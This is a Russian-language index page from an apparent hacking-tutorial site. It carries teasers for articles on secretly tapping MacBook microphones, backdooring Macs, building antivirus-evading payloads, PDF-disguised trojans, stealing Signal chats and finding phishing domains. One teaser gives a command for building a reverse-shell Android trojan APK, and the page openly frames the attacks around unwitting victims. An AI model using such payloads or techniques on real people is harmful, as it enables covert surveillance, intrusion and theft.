Декабрь 15, 2018
Домой Обучение (страницы 5)

Обучение


Как удаленно прослушивать микрофон на чьем-нибудь Macbook’е

Google, Amazon и Facebook всегда слушают. Что может быть хуже? Хакеры, кстати, тоже слушают. Особенно уязвимы ПК с Windows. С помощью нескольких простых команд хакер может удаленно захватить микрофон на чем-то Mac’е, а затем, используя потоковое аудио в режиме реального времени прослушивать частные разговоры без ведома жертвы, злоупотребляя халатным отношением к вопросам безопасности. После того, как хакер установит бэкдор на уязвимом MacBook …

Как удаленно взломать Android с помощью Kali

Привет, хакеры! Добро пожаловать на наш сайт. В этой статье мы расскажем, как взломать Android-телефон с помощью Kali. Мы не нашли ни одного туториала по использованию этого хака/эксплоита, поэтому и решили написать его сами. Возможно, вы уже о нем знаете. Шаг 1. Запустите Кали Откройте терминал, и создайте файл Trojan.apk Вы можете сделать это, набрав: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > …


Как сделать неуловимую полезную нагрузку. Часть 2. Скрытие полезной нагрузки

После того, как хакер создал PowerShell-полезную нагрузку, чтобы обойти антивирусное программное обеспечение, и настроил msfconsole на своей машине, он может перейти к следующему шагу — маскировке своего исполняемого файла, чтобы он выглядел как обычный текстовый. Вот так он и вынуждает ничего не подозревающих пользователей Windows 10 открывать полезную нагрузку. Полезная нагрузка для PowerShell, генерируемая Unicorn, работает на целевой машине Windows …

Как сделать неуловимую полезную нагрузку . Часть 1 . Обходя антивирусы

Хакеры всегда ищут эксплоиты, против которых еще не создано противоядие (т.н. zero-day), и которые еще могут успешно обойти функции безопасности Windows 10. Были проведены обширные исследования по созданию необнаруживаемых вредоносных программ и анализ целых проектов на GitHub, предназначенных для автоматизации создания необнаруживаемых полезных нагрузок, таких как WinPaylods, Veil v3 и TheFatRat. Используя приемы социальной инженерии, можно обмануть целевого пользователя и вынудить его открыть вредоносный …

Как украсть переписку из мессенджера Signal на MacBook при помощи USB-утенка

Разработанный в недрах Open Whisper Systems мессенджер Signal — это бесплатное приложение с открытым исходным кодом, предназначенное для шифрования коммуникаций, как для мобильных устройств, так и для десктопов. Оно позволяет пользователям совершать голосовые звонки, отправлять сообщения и даже делать видеозвонки. Однако недавно была обнаружена уязвимость в десктопной версии, которую можно превратить в полезную нагрузку для USB-утенка (USB Rubber Ducky) и украсть …

Как сделать фальшивый PDF-файл с трояном на AppleScript.Часть 2. Маскируем скрипт

Создав macOS-стейджера и разместив на своем сервере «слушателя» Empire, хакер может создать вредоносный AppleScript, а затем замаскировать его под обычный PDF-файл, используя несколько приемов работы с юникодом и иконками. Для этой атаки необходим реальный PDF-файл. Файлы размером более 1 МБ будут слишком большими и заставят пользователя задуматься о причинах такого размера. Настоящий PDF-файл будет каждый раз скачиваться, когда жертва будет …

Как создать фальшивый PDF-файл с трояном на AppleScript.Часть 1. Создание stager-нагрузки

Большинство хакеров используют многочисленные уязвимости в продуктах компании Adobe, чтобы доставлять полезные нагрузки пользователям Windows через зараженные PDF-файлы. Однако не все знают, что вредоносные PDF-файлы также могут нанести ущерб пользователям Mac, использующим дефолтное приложение для предварительного просмотра PDF. Поэтому дважды подумайте, прежде чем кликнуть по PDF-файлу на вашем MacBook’е — он может оказаться трояном, содержащим внутри руткит. В этой мини-серии …

Как настроить бэкдор на чьем угодно MacBook’е

Холивары о том, какая операционная система наиболее безопасна — macOS или Windows — вечная тема. Большинство скажут, что macOS более безопасен, но мы продемонстрируем, как сделать бэкдор на MacBook менее чем за две минуты, а затем просто поддерживать обратный шелл с помощью инструментов, уже встроенных в macOS. Windows 10 определенно не является эталоном безопасности, но в этой и последующих статьях …

Как определить используемую базу данных и выполнить общую разведку для увеличения шансов на более успешную атаку

«Знай своего врага» — мудрые слова, которые можно применить ко многим ситуациям, включая взлом баз данных. Нельзя даже думать о начале атаки на систему жертвы без проведения надлежащей разведки. Это касается любого типа атаки и SQL-инъекции — не исключение. Первая часть этой серии была посвящена основам баз данных, SQL и SQL-инъекций. Мы обеспечили вам фундамент знаний, на который вы уже …

Как легко и просто сгенерировать сотни фишинговых доменов

Для успеха любой фишинговой атаки убедительное имя домена имеет решающее значение. С помощью одного Python-скрипта можно найти сотни доступных фишинговых доменов и даже фишинг-сайты, развернутые другими хакерами, например для кражи учетных данных пользователей. Dnstwist, созданная @elceef — поисковая утилита, работа которой основана на перестановках букв в названии доменов. Она в состоянии обнаружить фишинговые домены, bitsquatting, Typosquatting и мошеннические веб-сайты с похожими доменными именами. …

Страница 5 из 10Первый...34567 ...Последние
Подпишись на обновления!

Реклама